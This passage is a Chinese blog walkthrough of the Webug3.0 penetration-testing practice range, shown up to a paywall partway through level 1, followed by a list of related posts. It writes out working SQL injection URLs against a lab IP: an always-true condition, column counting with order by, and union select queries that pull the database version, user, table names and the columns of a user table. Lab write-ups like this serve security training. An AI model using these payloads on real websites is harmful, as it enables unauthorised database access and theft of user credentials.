Webug3.0 初级攻略 1-16关

最新推荐文章于 2025-05-10 22:27:34 发布
原创 最新推荐文章于 2025-05-10 22:27:34 发布 · 2.9k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #渗透测试 #web靶场

虚拟机下载路径:

链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg 

提取码:7jfs 

  • 第一关:很简单的一个注入

 

使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试

1.提交 ' 报错,可能存在注入点

 

还是一个字符型的注入漏洞

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1'

 

2.提交 1' or 1='1 会显示出所有信息

 

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1='1

 

3. 使用order by 语句可以猜解这个数据表有多少个字段,目测就是4个了,当然有可能不是select * from tables_name:

order by 1

order by 2

order by 3 ······· 这个例子在order by 1--4 都是能够正确回显,直到order by 5 会出现报错,如图:

 

即这个表含有4个字段

该例子使用的测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1=1 order by 5-- -

 

4. 使用联合查询 union select 出现显示位

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,4-- -

此时也可以顺带把数据库的版本号,用户,和当前的数据库名字给查出

 

测试语句 http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,database(),version(),user()#

 

5.查表和列名

表名都显示出来了,有comment,flag,good,user 4个表

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

 

显示出了user表的列名:uid,uname,pwd,bill

测试语句:http://172.27.

最低0.47元/天 解锁文章

200万优质内容无限畅学
Webug3.0-渗透基础-解题
Blood_Pupil的博客
03-13 7705
Webug下载与安装 首先在Webug3.0官网 下载虚拟机 在本地进行解压,解压后为Win2003 VM虚拟机镜像。 虚拟机密码为123456,崩溃后可以直接将快照恢复到gh0st即可。 在kali下可以使用 Vmware Linux版打开,Windonws 下可以使用 Vmware Windows版打开,Mac下可以使用 Vmware Fusion打开。 在虚拟机命令窗口敲入ipconfi...
webug4.0笔记----(第一天:显错注入)
liver100day的博客
04-23 842
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
Webug3.0笔记03 第三:渗透网站的时候目录也很重要(目录遍历)
mooyuan的网络安全博客
04-22 751
由于提示目录名进行md5加密,这里的目录名为test,如下所示。不过返回提交:flag{人人都知道站长是个大帅比}还是不对。因为提示渗透网站的时候目录也很重要,所以使用工具渗透试试。从而获取到/flag{人人都知道站长是个大帅比}/看来这个flag不对,所以需要从其他思路入手。使用目录扫描工具进行渗透,渗透命令如下所示。拉到当前页面的最下面,提交flag。由于flag提交不对,分析一下源码。打开后直接把flag写在网页中。不过提交flag后看起来不太对。得到的加密结果如下所示。
Webug3.0笔记17 中级进阶(第01-05
mooyuan的网络安全博客
04-28 980
本系列专栏完成webug3中级渗透靶场卡的通,打开webug靶场渗透中级进阶版本,完成01-05个卡,包括文件包含漏洞、SQL注入漏洞等。
Webug4.0靶场笔记-靶场搭建方法(3种方法)
最新发布
mooyuan的网络安全博客
05-10 1531
Webug4.0 是国内安全团队开发的一款专注于Web应用安全渗透测试实战平台(靶场),适合网络安全学习者从入门到进阶的实战训练,本文讲解3种搭建webug4.0靶场的方法。
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
Exp10 Final 类CTF(Webug3.0漏洞靶场—渗透基础)
weixin_30376083的博客
05-23 487
一、前言 Webug定义为“我们的漏洞”靶场,基础环境基于PHP/MySQL搭建而成,整个web环境装在了一个纯净版的Windows Server 2003的虚拟机中。 此靶场包含了常见的漏洞,较为全面。 本次大实验基于Webug3.0版本的渗透基础部分。由于环境已经搭建完毕,在网上直接下载压缩包,解压后,在浏览器输入虚拟机的IP地址即可开始闯测试。 (不过,使用过程中,还是发现了一些配...
webug攻略
yyx的博客
04-29 4477
webug攻略第一 很简单的get注入第二 从图片中找到有用的信息第三 渗透网站的时候目录也很重要第四 当遇到五位验证码的时候可以爆破第五关 头部的一个注入第六 支付问题:用最少的钱去购买到一本书!第七 越权第八 csrf 管理员每天晚上10点上线第九 url跳转 你能跳转到百度页面吗?第十 文件下载第十一第十二 我忘记了系统密码第十三 XSS第十四 储存型xss第十...
搭建学习环境(十)——Webug3.0安装及初级记录
baynk的博客
11-30 1650
0x00 前言 安装可以直接下整个虚拟机来完成,也可以自己把虚拟机里面的文件拷到自己的环境的中进行漏洞,不过要修改的地方的比较多,不熟悉的话还是下整机吧。 整机云盘地址:https://pan.baidu.com/s/1MiFYrOGLD3XLBQWsVoSfmw www文件云盘地址:https://pan.baidu.com/s/1pMFlpMMUYmUkELMeTkO-ew 整机是基于wind...
Webug3.0-中级通记录(第一至第五关)
baynk的博客
12-03 600
0x00 前言 哎,windows的apache,还有php的版本,简直太难了。。。 0x01 第一:出来点东西吧 这没什么东西,就是一个任意文件读取,这里是windows环境下,也没有啥/etc/passwd需要读,读个php的文件得了。 这随你选什么都可以,但是在包含文件的时候,我发现包含php.ini并不能成功,但是包含php.gif却成功了。又想起之前xxe的时候,包含某一些文件时...
webug4.0笔记---(第一天:布尔注入)
liver100day的博客
04-23 794
布尔注入 页面在执行sql语句后,只会显示两种结果,Tuer or False 也就意味着,它不需要报错,不需要知道准确的字段个数, 归根结底它只心一点: 我们的sql到底有没有被执行成功 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不
UG3.0_win7_64位下的启动及安装
11-06
UG3.0_win7_64位下的启动及安装
我的webug之路:第十六(基础篇)
weixin_45822019的博客
03-21 251
第一步:题目 第二步:打开题目 第三步:输入进行测试 第四步:输入10.10.10.10 第五步:burpsuite拦截请求查看 第六步:对Host进行修改 得到回显: 第七步:在网上查攻略得知,还要把Referer改为www.baidu.com才会得到flag ...
Webug3.0 教程 第一:很简单的一个注入 普通的GET注入
weixin_44716769的博客
11-13 905
Webug3.0 教程 第一:很简单的一个注入 普通的GET注入 说明:以下步骤是我打靶场的记录,与大家分享我的学习过程,请各位大佬指正。 本题考点:SQL注入之mysql的联合查询爆破。 1. 打开本题,看到的是这样的界面 2. 在原始URL后分别加’和’’,在输入’时数据库报错,发现有字符型SQL注入漏洞 数据库对于单引号的规则: 1.单引号必须成对出现,否则数据库就会报错; 2.如果两...
Webug3.0靶机搭建
lxw826982262的博客
07-16 1209
Webug3.0靶机搭建 一、安装前的准备 安装环境:wmware; 安装前的准备:61webug压缩包;压缩包要下全,不然会导致windows2003无法打开。 二、webug3.0的安装 第一步解压 下载完成后61个压缩包如图所示: 第二步:选择其中一个进行解压得到一个2003的文件夹。 第三步:然后打开虚拟机,点左上角点击打开,选择2003文件夹,就看到虚拟机文件,打开它就得到如下图所示,...
webug3.0第一学习笔记
lxw826982262的博客
07-26 754
第一题:普通的GET注入 前言:这个注入前期有看过相的教学视频,对sql注入有一些了解,在手工注入和工具注入中,原理都是修改参数,让数据库报错,是因为开发人员在编程时,对用户输入的参数没有做过滤,直接把错误参数注入到数据库执行,并返回我们想要的结果。 第一种方法:手工注入 1.打开题目页面 在“id=1”后面键入单引号根据错误信息判断此参数存在注入点并可判断出后台数据库为MySQL,错误信息如...
webug3.0下载环境搭建使用
Gjqhs的博客
02-20 1778
打开文件类型为虚拟机配置的文件 启动 查看(靶机)IP
WeBug3.0靶场环境搭建与搭建资源分享
weixin_43460822的博客
07-06 4266
前言:这是我第一次接触WeBug靶场,以前也没有任何于信息安全方面的基础,骨头虽硬,但还是得咬紧牙去啃它,收获到的东西也必然很多。这是一遍于初次认识WeBug靶场,初入靶场,请各位大佬轻喷。 一、WeBug3.0的基本了解 webug名称定义为“我们的漏洞”靶场环境,基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏...
Webug3.0的6~12的学习笔记
weixin_43460822的博客
07-20 293
六、题目:这需要RMB购买哦 支付问题:用最少的钱去购买一本书 图片如下: 输入用户名和密码后可看到下面的图像: 在数量框随便输入,比如左框输入1,右框输入2,显示为: 3.可发现余额正常减少,我余额不足,所以买不了,如果你余额还够的话,会显示正常扣费,这个当然不是花最少的钱买到一本书哈。我们可以猜测服务器那边可能不检测数据。我们试着用Burp Suite 捉包,然后把价格都改为0.如下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我只会Traceroute

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值